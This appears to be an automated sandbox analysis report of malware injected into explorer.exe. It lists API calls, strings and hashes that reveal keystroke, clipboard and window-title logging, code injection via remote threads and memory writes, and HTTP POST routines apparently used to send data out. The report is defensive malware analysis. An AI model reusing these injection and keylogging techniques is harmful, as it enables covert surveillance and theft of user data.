• Opcode ID: 50028fdb266d7cfea099b2726b6c8cbfc7956093b4a1dcc1ddec40315b3b03d0
• Instruction ID: 50bd99cca2d214255427482b9561ec1dcdeb6ab9cdd0498251cf5f7383a85e35
• Opcode Fuzzy Hash: 50028fdb266d7cfea099b2726b6c8cbfc7956093b4a1dcc1ddec40315b3b03d0
• Instruction Fuzzy Hash: 0C41F6302043006BC714BF74DC95AFE77AAEF99740F510B2CF966872D1EB349E498661

Control-flow Graph
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B8000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b8000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d488b3e8245f5dd440e06198a239bd18594bb895d4ad5ab0ebeba96c05777334
• Instruction ID: 237ad44ed6b7193e592e35a7171037d64a5b785eceb24c10b64522c233b9e024
• Opcode Fuzzy Hash: d488b3e8245f5dd440e06198a239bd18594bb895d4ad5ab0ebeba96c05777334
• Instruction Fuzzy Hash: 4A513971A542524BD7249A78DDD0BF0BBA4EB52320B280739D6E6CB3C6E7A45C07C3A0

Control-flow Graph
APIs
• OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 001B2777
• MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,001B10FE), ref: 001B2789
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: File$MappingOpenView
• String ID:
• API String ID: 3439327939-0
• Opcode ID: 9131481d0b7d6e6474f8af77cbd018ee8f0c398adadb9d4a2228f2ea38294daf
• Instruction ID: 0d39e87dfd026253e9f78ad756ea61a8826fa57a65d472f8d16257cf00f9ac4e
• Opcode Fuzzy Hash: 9131481d0b7d6e6474f8af77cbd018ee8f0c398adadb9d4a2228f2ea38294daf
• Instruction Fuzzy Hash: B7D01732701231BBE3346A7B6C0CF83AE9DDF86AE1B010225B50DD2150D7608820C2F0

Control-flow Graph
APIs
• GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
• RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: e9f20a1805c3d9711523e8cf92997345acfec40cf7fdc884f5886674109c2c86
• Instruction ID: d29538dbb8b24e16b15f8f154136a5f4a7cfb8b1f1685c125e086972f4b308e4
• Opcode Fuzzy Hash: e9f20a1805c3d9711523e8cf92997345acfec40cf7fdc884f5886674109c2c86
• Instruction Fuzzy Hash: 88A002B1A541106BDD4477A49D0DF197658AF44701F0046447656C54509F7555958731

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 182 1b29bd-1b29cd VirtualAlloc
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,001B12D9,00000000,00000000,?,00000001), ref: 001B29C7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                      • Opcode ID: 2c3557a5b4690ddb39b8f2879aa938d3714b4fa9a6061d05c7129f8cd1229366
                                                                                                                                                      • Instruction ID: 52148b423f92c30fecce3bf2b981c07741f5d2c69f9f526cf427734038e43353
                                                                                                                                                      • Opcode Fuzzy Hash: 2c3557a5b4690ddb39b8f2879aa938d3714b4fa9a6061d05c7129f8cd1229366
                                                                                                                                                      • Instruction Fuzzy Hash: 57A002B07D5300BAFD69A7519D5FF152A189B40F02F114244B31A7C5D057E4B650863D

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 183 1b29ae-1b29bc VirtualFree
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,001B13A4), ref: 001B29B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                      • Opcode ID: a6e4d6aed7b5dfe9d05a431c88259958110bd0a58d47975a2de064d4e7ebadeb
                                                                                                                                                      • Instruction ID: e0d64d035bcacc2639a266cc64a38496a29eef2c10686ba94f365eb618f691fe
                                                                                                                                                      • Opcode Fuzzy Hash: a6e4d6aed7b5dfe9d05a431c88259958110bd0a58d47975a2de064d4e7ebadeb
                                                                                                                                                      • Instruction Fuzzy Hash: F2A0027079470076ED7467245D0EF0966546B40B02F2046447655A84D04AA5B1988A18

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001B2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,001B29F3,-00000001,001B128C), ref: 001B2731
                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 001B18F4
                                                                                                                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 001B192F
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001B19BF
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,001B3638,00000016), ref: 001B19E6
                                                                                                                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 001B1A0E
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 001B1A1E
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001B1A38
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 001B1A40
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1A4E
                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1A55
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 001B1A6B
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001B1A72
                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001B1A88
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001B1AB2
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001B1AC5
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1ACC
                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1AD3
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001B1AE7
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001B1AFE
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1B0B
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1B11
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1B17
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001B1B1A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                      • String ID: 0-vwP,vw$atan$ntdll$opera_shared_counter
                                                                                                                                                      • API String ID: 1066286714-1470420532
                                                                                                                                                      • Opcode ID: e08400d977b4ee06100005277c79b01939eb7e84864b264f5cf8b148e8346475
                                                                                                                                                      • Instruction ID: 0b09357e0e233db474fa8d29de869958a79d54a591906dc51a662134c400a528
                                                                                                                                                      • Opcode Fuzzy Hash: e08400d977b4ee06100005277c79b01939eb7e84864b264f5cf8b148e8346475
                                                                                                                                                      • Instruction Fuzzy Hash: 7F617871204305BFD310EF259D88EABBBECEF89754F410619F959D3291DB70EA448BA2

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 001B27B5
                                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001B27CD
                                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 001B27D5
                                                                                                                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001B27E0
                                                                                                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 001B27FA
                                                                                                                                                      • wsprintfA.USER32 ref: 001B2811
                                                                                                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 001B282A
                                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 001B2834
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                      • String ID: %02X
                                                                                                                                                      • API String ID: 3341110664-436463671
                                                                                                                                                      • Opcode ID: 8ec1026064a3bbf36144c5778a1122788f472ffc0a059aadf0656c22199949f0
                                                                                                                                                      • Instruction ID: ff65a9618786269a9074db1a99bb37f631d9773fe79c207d6c61630b8a9c3f1e
                                                                                                                                                      • Opcode Fuzzy Hash: 8ec1026064a3bbf36144c5778a1122788f472ffc0a059aadf0656c22199949f0
                                                                                                                                                      • Instruction Fuzzy Hash: 9411197190010CBFDB11AB99EC89EEEBBBCEB48311F104165F615E2160D7715FA59B60
                                                                                                                                                      APIs
                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 001B1652
                                                                                                                                                      • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 001B167A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: KeyboardStateUnicode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3453085656-3916222277
                                                                                                                                                      • Opcode ID: 70131ea5277be05c8172497d68c9035af989a161d0982f79ac59be6cff5ffac2
                                                                                                                                                      • Instruction ID: a523f1134b4509d0c920cd39eec7750563757f98ada329e9ece3674ac553def5
                                                                                                                                                      • Opcode Fuzzy Hash: 70131ea5277be05c8172497d68c9035af989a161d0982f79ac59be6cff5ffac2
                                                                                                                                                      • Instruction Fuzzy Hash: 3301D233910209BBDB34CB16DD65BFB73BCAF05B00F89411AE901E2040D7B0EA818AA1

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • RtlZeroMemory.NTDLL(001B5013,0000001C), ref: 001B13C8
                                                                                                                                                      • VirtualQuery.KERNEL32(001B13AE,?,0000001C), ref: 001B13DA
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 001B140B
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000004), ref: 001B141C
                                                                                                                                                      • wsprintfA.USER32 ref: 001B1433
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001B1448
                                                                                                                                                      • GetLastError.KERNEL32 ref: 001B144E
                                                                                                                                                      • RtlInitializeCriticalSection.NTDLL(001B582C), ref: 001B1465
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 001B1489
                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 001B14A6
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001B14AF
                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 001B14D0
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001B14D3
                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 001B14F1
                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 001B150D
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001B1514
                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 001B152A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
• String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
• API String ID: 3628807430-1779906909
• Opcode ID: ad45656a685a006bacbaf1c16a38a2453362aae604878bd4f432d7f602c71d25
• Instruction ID: 9365672132f7c97f08394184b65abd92334ca9ba3186b4b15517cd428df2cd4b
• Opcode Fuzzy Hash: ad45656a685a006bacbaf1c16a38a2453362aae604878bd4f432d7f602c71d25
• Instruction Fuzzy Hash: 1841E170600308FBD720BF66EC59EDB3BADEF98750B414118F50687691DB75D9548BA0

Control-flow Graph (rendering omitted)

APIs
• RtlEnterCriticalSection.NTDLL(001B582C), ref: 001B16C4
• lstrlenW.KERNEL32 ref: 001B16DB
• lstrlenW.KERNEL32 ref: 001B16F3
• wsprintfW.USER32 ref: 001B1743
• GetForegroundWindow.USER32 ref: 001B174E
• GetWindowTextW.USER32(00000000,001B5850,00000800), ref: 001B1767
• GetClassNameW.USER32(00000000,001B5850,00000800), ref: 001B1774
• lstrcmpW.KERNEL32(001B5020,001B5850), ref: 001B1781
• lstrcpyW.KERNEL32(001B5020,001B5850), ref: 001B178D
• wsprintfW.USER32 ref: 001B17AD
• lstrcatW.KERNEL32 ref: 001B17C6
• RtlLeaveCriticalSection.NTDLL(001B582C), ref: 001B17D3
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
• String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
• API String ID: 2651329914-3371406555
• Opcode ID: 1caa24c791a55a795b093721a0aef525af59191dc5cb32cf6d90a4596c9fcb07
• Instruction ID: 5ad633680eaaca5ee3d724e624a991d8db146f31d00cf68afc78dd84f905715c
• Opcode Fuzzy Hash: 1caa24c791a55a795b093721a0aef525af59191dc5cb32cf6d90a4596c9fcb07
• Instruction Fuzzy Hash: 4921B230600614BBD3213B2BEC99BEF3BAEEB41B557464224F41593961DF229E6186B1

Control-flow Graph (rendering omitted)

APIs
• GetCurrentProcessId.KERNEL32 ref: 001B2603
• GetCurrentThreadId.KERNEL32 ref: 001B260B
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001B261B
• Thread32First.KERNEL32(00000000,0000001C), ref: 001B2629
• OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 001B2648
• SuspendThread.KERNEL32(00000000), ref: 001B2658
• CloseHandle.KERNEL32(00000000), ref: 001B2667
• Thread32Next.KERNEL32(00000000,0000001C), ref: 001B2677
• CloseHandle.KERNEL32(00000000), ref: 001B2682
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
• String ID:
• API String ID: 1467098526-0
• Opcode ID: a3c609055246226e93954e3429d155ae74567e6e378a7bad3a7a028e19cc336d
• Instruction ID: 22ab3fd1b08cb4947e4b52a0c419d7d4402722f72d15b7ab9c074b6662d08d3b
• Opcode Fuzzy Hash: a3c609055246226e93954e3429d155ae74567e6e378a7bad3a7a028e19cc336d
• Instruction Fuzzy Hash: F611A131409200EFD711AF60EC4CAAFBFB4FF85701F000629FE5592550D7308AA98BA3

Control-flow Graph (rendering omitted; legend: Executed / Not Executed; function starting at 001B20A1)

APIs
  • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
  • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
  • Part of subcall function 001B298A: lstrlen.KERNEL32(001B4FE2,?,00000000,00000000,001B20DD,771A8A60,001B4FE2,00000000), ref: 001B2992
  • Part of subcall function 001B298A: MultiByteToWideChar.KERNEL32(00000000,00000000,001B4FE2,00000001,00000000,00000000), ref: 001B29A4
  • Part of subcall function 001B24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 001B24DE
• RtlZeroMemory.NTDLL(?,0000003C), ref: 001B2139
• wsprintfW.USER32 ref: 001B2272
• wsprintfW.USER32 ref: 001B22DD
• RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 001B23A7
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
• String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
• API String ID: 4204651544-1701262698
• Opcode ID: 807050d28b37f924cc5b981cbb5bfadcc955108f2836b2e6a05cf249bc15738e
• Instruction ID: 44ecbe1d9b1fb749507dc89747d9d858f18880eb7e59c98f5d3d405dfe067193
• Opcode Fuzzy Hash: 807050d28b37f924cc5b981cbb5bfadcc955108f2836b2e6a05cf249bc15738e
• Instruction Fuzzy Hash: 4FA17B71608341AFD310AF68DC85AABBBE8FF88744F04092DF595D7261DB74DD488B62

Control-flow Graph (rendering omitted; legend: Executed / Not Executed; function starting at 001B12AE)

APIs
  • Part of subcall function 001B29BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,001B12D9,00000000,00000000,?,00000001), ref: 001B29C7
• lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 001B12DC
  • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
  • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
• PathMatchSpecA.SHLWAPI(?,00000000), ref: 001B138A
  • Part of subcall function 001B2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,001B1119,00000001), ref: 001B2850
  • Part of subcall function 001B2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,001B1119,00000001), ref: 001B2855
• RtlZeroMemory.NTDLL(00000000,00000104), ref: 001B1316
• RtlMoveMemory.NTDLL(00000000,?,?), ref: 001B1332
  • Part of subcall function 001B2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001B136E), ref: 001B2591
  • Part of subcall function 001B2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 001B259A
• RtlMoveMemory.NTDLL(00000000,?,?), ref: 001B135F
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
• String ID:
• API String ID: 2993730741-0
• Opcode ID: 39f3c1e631177243a0590c37c6f34395ec82d604e2d573413411e33750ef8665
• Instruction ID: 7cb8d947fd800ffa3153e170a3f7bcd0021d5dd30fee076defc9921bda68dbbb
• Opcode Fuzzy Hash: 39f3c1e631177243a0590c37c6f34395ec82d604e2d573413411e33750ef8665
• Instruction Fuzzy Hash: 9F21AD70B04201AF8314EF2898659BEB7DABF94710B510A3EF856D3651EB34DD498A62

Control-flow Graph (rendering omitted; legend: Executed / Not Executed; function starting at 001B1581)

APIs
• GlobalLock.KERNEL32(00000000), ref: 001B15A9
• lstrlenW.KERNEL32(00000000), ref: 001B15C6
• lstrcatW.KERNEL32(00000000,00000000), ref: 001B15DC
• lstrlenW.KERNEL32(00000000), ref: 001B1600
• GlobalUnlock.KERNEL32(00000000), ref: 001B161C
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: Globallstrlen$LockUnlocklstrcat
• String ID:
• API String ID: 1114890469-0
• Opcode ID: 75b3e28350fd086bac562efd925418767630201d865914c6f2da5cab13c06ec4
• Instruction ID: 9adaa8232505f6be6ec0431dad7ad1c5e8a8647aab6e8a5befd6d0c08c3237c9
• Opcode Fuzzy Hash: 75b3e28350fd086bac562efd925418767630201d865914c6f2da5cab13c06ec4
• Instruction Fuzzy Hash: D601C032A001117B8639777A6CB86FE73AE9FEB71174A412AF80B93612DF748D464290
APIs
• RtlMoveMemory.NTDLL(?,?,?), ref: 001B1BF4
• LoadLibraryA.KERNEL32(?,001B5848,00000000,00000000,771B2EE0,00000000,001B19B6,?,?,?,00000001,?,00000000), ref: 001B1C1C
• GetProcAddress.KERNEL32(00000000,-00000002), ref: 001B1C49
• LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 001B1C9A
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
• String ID:
• API String ID: 3827878703-0
• Opcode ID: aa9c7dd449163c0beb219cab3cdfd66e262b08692f4557973f2b8c43c5bed955
• Instruction ID: 7196920010d528cad0e55a900977c95194ef96f0eb7e229d4e2140ccdbfd8e8a
• Opcode Fuzzy Hash: aa9c7dd449163c0beb219cab3cdfd66e262b08692f4557973f2b8c43c5bed955
• Instruction Fuzzy Hash: C9318F71740616BFCB18CF29C8E4BA6BBA8BF15314F96462CE856C7600D731E855DBA0
APIs
• RtlEnterCriticalSection.NTDLL(001B582C), ref: 001B1839
• lstrlenW.KERNEL32 ref: 001B1845
• RtlLeaveCriticalSection.NTDLL(001B582C), ref: 001B18A9
• Sleep.KERNEL32(00007530), ref: 001B18B4
Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2134730579-0
                                                                                                                                                      • Opcode ID: de614c34dc0f6660967f1b89c6625a10f8d102bc0542707c7f8d1b2a4e55f326
                                                                                                                                                      • Instruction ID: 091be761fd05b5ad0801c2e31ab20b748e51bddd263c0efc64d30e55471bf4b5
                                                                                                                                                      • Opcode Fuzzy Hash: de614c34dc0f6660967f1b89c6625a10f8d102bc0542707c7f8d1b2a4e55f326
                                                                                                                                                      • Instruction Fuzzy Hash: 6401F930910600EBD7147B76EC6AABE3AAAFF457407100228F405C7661DF34DD49DBB2
                                                                                                                                                      APIs
                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,001B11DD), ref: 001B26DB
                                                                                                                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 001B26ED
                                                                                                                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 001B2700
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001B2716
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 331459951-0
                                                                                                                                                      • Opcode ID: 81dac3df870039d5ee5a96c910281f9023428c65daa35e4c4844d25c603fd54b
                                                                                                                                                      • Instruction ID: 96e2c338227dec6162ce4e8184530d589f4fc3538647f7fb7eeb4d7da5a0ad19
                                                                                                                                                      • Opcode Fuzzy Hash: 81dac3df870039d5ee5a96c910281f9023428c65daa35e4c4844d25c603fd54b
                                                                                                                                                      • Instruction Fuzzy Hash: C5F0B471842218FF9B10DFA1DD488EEB7BDEF05352B20036AF91093140DB304F4496A5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
                                                                                                                                                        • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
                                                                                                                                                      • GetLocalTime.KERNEL32(?,00000000), ref: 001B17F3
                                                                                                                                                      • wsprintfW.USER32 ref: 001B181D
                                                                                                                                                      Strings
                                                                                                                                                      • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 001B1817
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                                                      • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                                                      • API String ID: 377395780-613334611
                                                                                                                                                      • Opcode ID: 54ec78c7dead9fdef3f407b537aedee3a2931bf0b2ab9693ed620dfd459a38e7
                                                                                                                                                      • Instruction ID: 691d6d60fa0180a3d7e115f7b55267089c71dad895bb2071cb6df855c359a07d
                                                                                                                                                      • Opcode Fuzzy Hash: 54ec78c7dead9fdef3f407b537aedee3a2931bf0b2ab9693ed620dfd459a38e7
                                                                                                                                                      • Instruction Fuzzy Hash: 41F03062900128BAC7146BDD9C458FFB2FCEF0CB02B00028AFA51E2180E7785AA0D3B5

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:13%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:20
                                                                                                                                                      Total number of Limit Nodes:3

                                                                                                                                                      Callgraph


                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 009D378C
                                                                                                                                                      Memory Dump Source
